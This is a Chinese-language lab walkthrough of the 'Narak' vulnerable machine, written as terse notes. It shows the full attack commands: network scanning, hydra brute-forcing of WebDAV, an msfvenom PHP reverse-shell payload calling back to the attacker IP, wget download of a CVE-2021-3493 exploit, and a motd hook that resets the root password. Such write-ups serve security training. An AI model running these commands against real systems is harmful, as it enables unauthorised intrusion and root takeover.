打靶narak
打靶narak
- 主機(jī)發(fā)現(xiàn)
- 端口掃描
- dirb基于字典的目錄掃描工具
- 網(wǎng)絡(luò)存儲(chǔ)文件共享之WebDAV
- 再嘗試登陸下:
- cadaver工具連接
- 上傳shell
- 用 msfvenom生成木馬
- 提權(quán) 權(quán)限維持
- 用ssh嘗試登錄其他用戶,
- 提權(quán)助手 提權(quán) github 開源項(xiàng)目
- 挨個(gè)試一試
- 第一種 : 通過gcc編譯提權(quán)文件,上傳執(zhí)行后,提權(quán)至root獲取:
- 這種.c文件需要編譯成可執(zhí)行文件 記住
- 第二種:使用motd提權(quán),
主機(jī)發(fā)現(xiàn)
nmap -sS 192.168.226.0/24
端口掃描
dirb基于字典的目錄掃描工具
發(fā)現(xiàn)三個(gè)目錄
訪問該目錄
網(wǎng)絡(luò)存儲(chǔ)文件共享之WebDAV
再用hydra爆破以下
或者burpsuite爆破
yamdoot, Swarg
.海德拉(Hydra)
Medusa(美杜莎)
patator
msf
都可以
用cewl工具通過爬取網(wǎng)站信息的關(guān)鍵字來生成字典,通過生成的字典進(jìn)行爆破
用hydra爆破工具爆破
-L指定用戶名 -P指定密碼 ip地址加協(xié)議加路徑。http就是網(wǎng)站的協(xié)議,get是采用的請(qǐng)求方法,后面加路徑
再嘗試登陸下:
無可用信息,查看下源代碼:
cadaver工具連接
cadaver http://192.168.8.132/webdav
username:yamdoot
password:Swarg
1.百度發(fā)現(xiàn)webdav服務(wù),需要cadaver工具連接,連接之后可以上傳
上傳shell
nmap -O 發(fā)現(xiàn)其實(shí) linux 系統(tǒng)
用 msfvenom生成木馬
msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.226.142 lport=22345 -f raw -o /home/kali/Desktop/phpshell.php
監(jiān)聽
上傳
liunx失敗換一個(gè)php的
msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.226.142 lport=22345 -f raw -o /home/kali/Desktop/phpshell.php
msf 監(jiān)聽
訪問php文件
shell拿到
提權(quán) 權(quán)限維持
權(quán)限低
查看用戶:
mnt 目錄 hell.sh
https://www.splitbrain.org/services/ook
brainfuck to text解碼,得到解密內(nèi)容chitragupt 應(yīng)該是密碼
chitragupt
用ssh嘗試登錄其他用戶,
輸入剛剛解密的密碼,發(fā)現(xiàn)成功登錄該用戶
ssh inferno@192.168.226.155
提權(quán)助手 提權(quán) github 開源項(xiàng)目
https://github.com/mzet-/linux-exploit-suggester
linux中的.sh文件怎么執(zhí)行?
1、直接./加上文件名.sh,如運(yùn)行hello.sh為 ./hello.sh 【絕對(duì)路徑下也可以,但hello.sh必須有x權(quán)限】
chmod u+x hello.sh
上傳解壓
挨個(gè)試一試
第一種 : 通過gcc編譯提權(quán)文件,上傳執(zhí)行后,提權(quán)至root獲取:
通過https://github.com/briskets/CVE-2021-3493 下載提權(quán)文件:
使用gcc將提權(quán)文件編譯成可執(zhí)行文件:
這種.c文件需要編譯成可執(zhí)行文件 記住
gcc exploit.c -o exploit開放本機(jī)的8888端口 提供下載:
通過wget 傳送至靶機(jī)上:
wget http://192.168.226.142:8888/exploit
第二種:使用motd提權(quán),
在文件中最后一行寫入命令,將root密碼替換掉,切換root用戶獲取。
echo “echo ‘root:inferno’|sudo chpasswd” >> /etc/update-motd.d/00-header
退出后重新用inferno登錄
su -root
成功獲取root權(quán)限: 密碼 inferno
總結(jié)
- 上一篇: 人民日报申论范文:让网络文学更好表达当代
- 下一篇: 汽车中控介绍(笔记)